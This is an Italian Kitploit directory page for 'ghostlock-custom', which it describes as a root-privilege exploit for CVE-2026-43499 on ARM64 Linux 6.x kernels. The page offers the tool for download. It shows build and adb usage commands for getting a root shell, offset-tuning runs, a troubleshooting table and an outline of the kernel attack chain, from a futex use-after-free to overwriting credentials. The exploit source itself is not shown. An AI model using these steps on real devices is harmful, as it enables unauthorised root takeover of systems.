Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ghostlock-custom — GhostLock (CVE-2026-43499) adattamento per Linux 6.x ARM64 non Android | Kitploit
Strumenti/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

GhostLock (CVE-2026-43499) adattamento per Linux 6.x ARM64 non Android

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1 giorno faNon ancora revisionato

GhostLock Custom — Adattamento per CVE-2026-43499

Exploit di elevazione privilegi GhostLock (CVE-2026-43499) per kernel non Android Linux 6.x ARM64.

Caratteristiche del kernel

VoceValore
ArchitetturaARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
Versione kernel6.x
SELinuxNessuno
ashmemNessuno
configfsNessuno

Compilazione

Compilazione locale (richiede cross-compilatore)

root@kitploit:~
make

Compilazione con Android NDK

root@kitploit:~
make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (compilazione cloud)

La compilazione viene attivata automaticamente dopo il push; scaricare l'artifact.

Utilizzo

root@kitploit:~
# Inviare al dispositivo di destinazione
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# Ottenere una shell root
adb shell /data/local/tmp/e --shell

# Regolare l'offset di pselect (se il valore predefinito non funziona)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# Specificare l'indirizzo di caricamento fisico
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

Variabili d'ambiente

Principio di elevazione privilegi

  1. Gara futex PI: FUTEX_CMP_REQUEUE_PI innesca la UAF in remove_waiter()
  2. Overflow dello stack di pselect: il rt_mutex_waiter liberato finisce nel buffer stack_fds
  3. Scrittura nell'albero PI: scrittura arbitraria in indirizzi di memoria del kernel tramite un fake waiter costruito ad arte
  4. Sovrascrittura di cred: task_struct->cred viene sovrascritto con init_cred

Note sull'adattamento

Questa versione è una versione semplificata di ghostlock-oneplus:

  • Rimosso il codice di disabilitazione di SELinux (questo kernel non ha SELinux)
  • Rimossi i codici relativi ad ashmem/configfs (questo kernel non ha questi componenti)
  • Rimosso il codice di installazione di KernelSU
  • Rimossa la leak di KASLR SLIDE (nessun loggers/nfulnl_logger)
  • Rimossi i codici specifici per Android (miniADB, ecc.)

Risoluzione dei problemi

Disclaimer

Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza. L'utente è l'unico responsabile di ogni utilizzo.

Scarica lo strumento
VariabileValore predefinitoDescrizione
PSELECT_SHIFT-2Regolazione dell'offset di pselect waiter sullo stack
KPHYS0x80000000Indirizzo di caricamento fisico del kernel
KIMAGE_TEXT_BASE0xffffffc008000000Indirizzo virtuale di base del kernel
SintomoCausa possibileSoluzione
Riavvio del dispositivoPSELECT_SHIFT erratoProvare uno per uno da -4 a +4
Nessun effettoKPHYS erratoVerificare il valore corretto in /proc/iomem
perf_event_open fallitoLimitazione seccompProvare a eseguire tramite ADB shell
Nessun rootOffset non corrispondentiVerificare la versione del kernel, controllare TASK_CRED_OFF